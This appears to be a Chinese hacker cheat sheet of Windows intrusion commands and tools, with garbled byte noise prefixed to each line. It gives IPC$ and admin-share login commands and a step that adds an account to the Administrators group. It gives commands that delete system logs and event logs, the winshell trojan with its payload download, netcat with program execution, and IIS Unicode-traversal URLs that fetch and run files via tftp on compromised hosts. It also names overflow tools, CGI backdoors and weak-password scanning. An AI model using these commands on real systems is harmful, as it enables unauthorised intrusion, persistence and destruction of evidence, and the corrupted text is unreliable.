网管和黑客都必须知道的命令
,�G1�|]
~� 常用的几条NET命令:
_��%l+v��� Cq�1t[a��� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
n�]4)~ZIAU �S}e*~^1J� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
`��u:U{m� @Fk�N�T~OZ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
M�4M
4�*�o �Y'/`�?�CK (查看远程主机时间) net time \\IP地址
�u�]E%�R& �eFXx�kWR) (定时启动某个程序) at \\IP地址 02:18 readme.exe
x�=1G|<�z% &{&lC��BN (查看共享) net view \\IP地址
b7v]�� g]* �t,�N�-��| (查看netbios工作组列表) nbtstat -A IP地址
{1���14
�[ w������;H� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
wO}
3i�6�� c%pW�'�UE& (这两条把自己增加到管理员组): net user 用户名 密码 /add
C�C��q�<�y K1O/>dN_\O net localgroup Administrators 用户名 /add
9�Y�HS�L[� SfJ��/(�q� (断开连接) net use \\IP地址\ipc$ /delete
��k;��zb�q 0x���# 6�L 扫尾:
b9|F>3?r>� ���^1,]?F^ del C:\winnt\system32\logfiles\*.*
\+G�XU�nkj !dhZs?/UI� del C:\winnt\ssytem32\config\*.evt
9 K$�F.{cx %9mB4Fc6b) del C:\winnt\system32\dtclog\*.*
�B>X+��eK� 1sc� #!^Oo del C:\winnt\system32\*.log
mm#U a/~1u �&%u,b~cL? del C:\winnt\system32\*.txt
��|BH�,
�H 8f�^URN<�x del C:\winnt\*.txt
�C�==tJog[ 3Un/�-4uL� del C:\winnt\*.log
�F]yclXf(' r\],5x'xSu 一、netsvc.exe
�~�R)w
9uq �n4."}DO�� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
"G6�d'x�kP idO3�/>R
[ netsvc /list \\IP地址
G&�C�)`�}; ?2EzNN�c�S netsvc schedule \\IP地址 /query
GU�&�XK7L� �U\VwJ2
{i netsvc \\IP地址 schedule /start
cIM5;"�gLP vp ��mSzh 二、OpenTelnet.exe
7C�2/^x P� ���Q�g�6m� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
A9��l�^S|r
�}�f&7<�E OpenTelnet \\IP地址 用户名 密码 1 7878
)CR8-z��1` �3%E�wA\V( 然后就可以telnet到主机的7878端口,进入DOS方式下:
aqzvT5*�8% iT^lk'?�{O telnet IP地址 7878
P#ru�-0DD �-m'a�%aog 三、winshell.exe
L6 _S�c-sU w4L\@�y�3 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
^��;@Bz~Z� '3hvR���4P p Path (查看winshell主程序的路径信息)
^����*
DKF :+Dn�]:\� b reBoot (重新启动机器)
KAs��S=� ` KMbBow3o*~ d shutDown (关闭机器)
GUN<ZOY�b= G$@X>)�2N8 s Shell (执行后你就会看到可爱的“C:\>”)
H50nR$$<*Y +Z;0�"'K'e x eXit (退出本次登录会话,此命令并不终止winshell的运行)
+'#d*r91@� 3�^
Z� tIZ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
tQ&#�FFt,) uDoSe��^0 四、3389登陆器,GUI方式登录远程主机的
fs)O7x-�B( 9(X
*[�X�# 五、elsave.exe
�
%;�W8�;� Ue,"�C�Q6H 事件日志清除工具
!�h4�So�4p ^Ws�~h\{�% elsave -s \\IP地址 -l "application" -C
um8ZhX��q� J�7cq�n�j elsave -s \\IP地址 -l "system" -C
�i-og�e�R? ��YYM����� elsave -s \\IP地址 -l "security" -C
7��L<oWAq� I���"
�j7 执行后成功清除应用程序日志,系统日志,安全日志
wK\�S�eX� *@B�Bl�kcx 六、hbulot.exe
�5N|77AAxK ��]B�7t�9l 开启win2kserver和winxp的3389服务
�F�
H%y�yT _%�L3?PpF" hbulot [/r]
���X@D��3� �
E�;|\?>� 使用/r表示安装完成后自动重起目标使设置生效。
5��
+�
Jy
�S��v�>�aZ 七、nc.exe(netcat.exe)
;zJ_apZ:{� %vThbP#mR| 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
_9�gn;F��� d�kn_`j\v� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
��?t�%5�/ <�kM%z�{p� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
&WRoNc���� �.-3�4�g�5 参数:
d[Fsp7U�}� 'V>�+�G�>U -e prog 程序重定向,一旦连接,就执行 [危险!!]
d�
z\b]�H] �{�U<h�tl4 -g gateway source-routing hop point[s], up to 8
4Sl^cKb�$7 eo,]b1C2n� -G num source-routing pointer: 4, 8, 12, ...
.�LS.Z
4@ D��0�]9
-h -h 帮助信息
E�n�Uo �B< ��p_nru�a? -i secs 延时的间隔
��#]'V#[;~ [�a
Z)*L
; -l 监听模式,用于入站连接
\C6m.%%={R �(�J;?eeP� -n 指定数字的IP地址,不能用hostname
�e,4G:V'NX ��F3f>pK5� -o file 记录16进制的传输
B�h.'%[�', 'qD9k��J`� -p port 本地端口号
He@= bLLa� Z�EM�o`�O� -r 任意指定本地及远程端口
?@,�:�\ ,G V��,�"'k<y -s addr 本地源地址
ynd}w�
G�' o�y'��+n-� -u UDP模式
@Uu\�x~3y x~z 2l#�ow -v 详细输出——用两个-v可得到更详细的内容
���-|���T^ A�f%?WZlOq -w secs timeout的时间
�FP��Mk�&� �GJ$���,�@ -z 将输入输出关掉——用于扫描时
g-�s@�m}[T 八、TFTPD32.EXE
�V:+�bq` 0�CR;t�`M@ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
;|%r!!�#-t I"!�{HnSG` http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
:({<"H)!�' 2u:���j6ic 然后可以直接令文件运行:
�Ue7W�&N^E �K_x�OY
�* http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
tv{.iM|V c t5qAH++axN 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
s [!SG�`& lyPXl���t� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
W7�
�E-j+2 z��~_\on�C 一、一 Xscan命令行运行参数说明:
�-jy"?]ve. Rj�u8%F�RO 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�Z8@�]e�}n
�u��0e#iX 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�Rb0{t[IU tvUvd(8�w� xscan -file <主机列表文件名> <检测项目> [其他选项]
�
R
pbl)�� W�WL�V��y( 其中<检测项目> 含义如下:
_���7<U[63 :6 fQE#(s& -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
QU�D��VsN# �Ss�:,#| � -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
+g[B &A!d+ K_aN7?#.v` -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
._�3NqE�;� .R'i�=D`Pz -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
i=D,T[|>a NZuFxJ-�` -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�7�y\g~?5N a*hTh�r+$M [其他选项] 含义如下:
X�
A|`wAGP z,)sS<t(� -v: 显示详细扫描进度
&�^H
"T6�� h~@+M5�r�, -p: 跳过Ping不通的主机
�[
lW
"��M �ni>
;8O]= -o: 跳过没有检测到开放端口的主机
�fz3*oJ��' /WfV�G�\NF -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
